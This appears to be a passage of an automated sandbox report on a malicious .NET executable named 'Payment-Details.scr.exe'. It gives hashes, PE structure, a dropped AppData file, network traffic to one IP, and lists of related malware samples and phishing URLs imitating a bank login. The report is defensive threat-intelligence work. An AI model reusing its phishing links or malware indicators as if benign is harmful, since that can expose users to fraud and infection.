                                      http://46814880-10-20181030130048.webstarterz.com/tedsplay.com/onlinebankingmtb/securityauthentication.html?onlinebanking.mtb.com/Login/MTBSignOn?security+authenticationGet hashmaliciousUnknownBrowse
                                      • 163.44.198.51
                                      http://46814880-10-20181030130048.webstarterz.com/tedsplay.com/onlinebankingmtb/secq.html?onlinebanking.mtb.com/Login/MTBSignOnGet hashmaliciousUnknownBrowse
                                      • 163.44.198.51
                                      TUT-ASUSExeFile (275).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (351).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (206).exeGet hashmaliciousRMSRemoteAdmin, XmrigBrowse
                                      • 208.95.112.1
                                      DHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      documentos43.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PI-0008102024002REMAP.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      INV N.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PAGO SWIFT INV NUMB43568B30000097 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                                      • 208.95.112.1

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eExeFile (279).exeGet hashmaliciousBlackMoon BankerBrowse
                                      • 5.144.130.41
                                      https://teamsportalmst365.ubpages.com/teams-2051/Get hashmaliciousUnknownBrowse
                                      • 5.144.130.41
                                      SecuriteInfo.com.Win32.MalwareX-gen.15358.5163.exeGet hashmaliciousStormKitty, SugarDump, XWormBrowse
                                      • 5.144.130.41
                                      SecuriteInfo.com.Win32.MalwareX-gen.13009.27381.exeGet hashmaliciousXWormBrowse
                                      • 5.144.130.41
                                      S0fJap0SX1.lnkGet hashmaliciousUnknownBrowse
                                      • 5.144.130.41
                                      https://esrour.geoffice.cloud/Get hashmaliciousHTMLPhisherBrowse
                                      • 5.144.130.41
                                      nf075-4d-qns0-w383.msiGet hashmaliciousUnknownBrowse
                                      • 5.144.130.41
                                      https://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousUnknownBrowse
                                      • 5.144.130.41
                                      ExeFile (95).exeGet hashmaliciousUnknownBrowse
                                      • 5.144.130.41
                                      ExeFile (97).exeGet hashmaliciousUnknownBrowse
                                      • 5.144.130.41

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Roaming\Fdimzk.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Payment-Details.scr.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):132608
                                      Entropy (8bit):5.735613874831862
                                      Encrypted:false
                                      SSDEEP:3072:1aEYLUfh5+u/Ua2HBrvyIBfn8+ux221Hll:1acfh5+CpK+
                                      MD5:EEE76D74368111C385E634A9F4F5A9CF
                                      SHA1:35A9AFB88F649E243A1BE654EF7AAD6E5DAFBCE5
                                      SHA-256:82EE5C8372F9BC8AC9CFAC2833C19D238FA8A60FA32E6D27D9FC781D2E64DC25
                                      SHA-512:C0ABB244EBBB840260D0295B1181B02914E68F309509933E07A5048816B0A19D2F11336537C4EACC5A470B3F702F22BD92620CF7AD836E5AE0657EEF1015F41F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 18%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.............................+... ...@....@.. .......................`............`..................................+..S....@.......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......@......................@..B.................+......H........!...............................................................(....*.s....r...p(....o....o....o....o....*..(....*.0..I.......(....(....o.......8+............r...p .......o....&.....&.......X....i2.*............8.......0.......... ..........8.....(..........&.......i .......*...................0..........(....s......s......o.....o....Z...........88......8 ........o........%.X...(........X.....o....2....X.....o....2..........9.....o......9.....o.......*..........gy..

                                      C:\Users\user\AppData\Roaming\Fdimzk.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\Payment-Details.scr.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):5.735613874831862
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Payment-Details.scr.exe
                                      File size:132'608 bytes
                                      MD5:eee76d74368111c385e634a9f4f5a9cf
                                      SHA1:35a9afb88f649e243a1be654ef7aad6e5dafbce5
                                      SHA256:82ee5c8372f9bc8ac9cfac2833c19d238fa8a60fa32e6d27d9fc781d2e64dc25
                                      SHA512:c0abb244ebbb840260d0295b1181b02914e68f309509933e07a5048816b0a19d2f11336537c4eacc5a470b3f702f22bd92620cf7ad836e5ae0657eef1015f41f
                                      SSDEEP:3072:1aEYLUfh5+u/Ua2HBrvyIBfn8+ux221Hll:1acfh5+CpK+
                                      TLSH:C5D38191E3587CB6E81A13B68D768B11261BFE688AB6471F241EB1255DB335334F3C0B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................+... ...@....@.. .......................`............`................................

                                      File Icon

                                      Icon Hash:3c58898989a5999b

                                      Static PE Info

                                      General

                                      Entrypoint:0x402bfe
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66C494E8 [Tue Aug 20 13:06:48 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2ba80x53.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1f20e.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xc040xe00e9ffce180b335184e57782ba138066daFalse0.5200892857142857data4.869446235593652IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0x40000x1f20e0x1f4006aedfef7a2fbe9b03f414e11eee10c22False0.36746875data5.741550330836554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x240000xc0x2001ec5690d2ab1631d2d5d2bb14cdaf54eFalse0.041015625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x42200x6583PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9947666140762689
                                      RT_ICON0xa7a40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.16020939311487045
                                      RT_ICON0x1afcc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.264407179971658
                                      RT_ICON0x1f1f40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.32427385892116184
                                      RT_ICON0x2179c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.41322701688555347
                                      RT_ICON0x228440x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.5771276595744681
                                      RT_GROUP_ICON0x22cac0x5adata0.7666666666666667
                                      RT_VERSION0x22d080x31cdata0.4321608040201005
                                      RT_MANIFEST0x230240x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 20, 2024 18:39:14.554493904 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:14.554538965 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:14.554599047 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:14.569133997 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:14.569159031 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:24.392005920 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:24.392179966 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:24.397270918 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:24.397289991 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:24.397522926 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:24.450824022 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:24.737580061 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:24.780495882 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.001435041 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.044594049 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.044616938 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.091481924 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.168500900 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.168518066 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.168546915 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.168555021 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.168570995 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.168593884 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.168611050 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.168642998 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.216485977 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.218597889 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.218614101 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.218636990 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.218645096 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.218661070 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.218667984 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.218682051 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.218736887 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.340096951 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.340114117 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.340130091 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.340137005 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.340239048 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.340270996 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.340285063 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.340301991 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.385835886 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.385870934 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.385927916 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.385970116 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.386010885 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.386028051 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.386063099 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.412921906 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.412940979 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.413044930 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.413080931 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.413127899 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.436659098 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.436686993 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.436743021 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.436767101 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.436805010 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.436819077 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.517713070 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.517738104 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.517788887 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.517806053 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.517853022 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.537009001 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.537060976 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.537156105 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.537193060 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.537209988 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.537228107 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.557323933 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.557374001 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.557477951 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.557511091 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.557550907 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.557575941 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.575124979 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.575145960 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.575258970 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.575273991 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.575320005 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.588949919 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.588996887 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.589082956 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.589097023 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.589107990 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.589140892 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.613183022 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.613200903 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.613328934 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.613353968 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.613405943 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.625128031 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.625147104 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.625274897 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.625289917 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.625330925 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.675762892 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.675782919 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.675908089 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.675924063 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.675966978 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.687958956 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.687977076 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.688097954 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.688114882 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.688158989 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.697994947 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.698012114 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.698085070 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.698096037 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.698136091 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.708898067 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.708923101 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.708981037 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.708988905 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.709012032 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.709034920 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.719372988 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.719403982 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.719469070 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.719477892 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.719505072 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.719521046 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.727823019 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.727843046 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.727890968 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.727900982 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.727938890 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.738594055 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.738610983 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.738682032 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.738696098 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.738735914 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.744580984 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.744604111 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.744668961 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.744683027 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.744716883 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.767949104 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.767972946 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.768062115 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.768079996 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.768115044 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.777620077 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.777640104 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.777704000 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.777717113 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.777756929 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.788434029 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.788454056 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.788511038 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.788520098 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.788553953 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.799994946 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.800010920 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.800079107 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.800090075 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.800122023 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.808245897 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.808264971 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.808322906 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.808331966 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.808379889 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.817231894 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.817253113 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.817312956 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.817322016 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.817357063 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.838799953 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.838820934 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.838891983 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.838903904 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.838937998 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.844079971 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.844099045 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.844161034 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.844171047 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.844203949 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.862307072 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.862335920 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.862404108 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.862433910 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.862476110 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.865338087 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.865358114 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.865415096 CEST49704443192.168.2.85.144.130.41
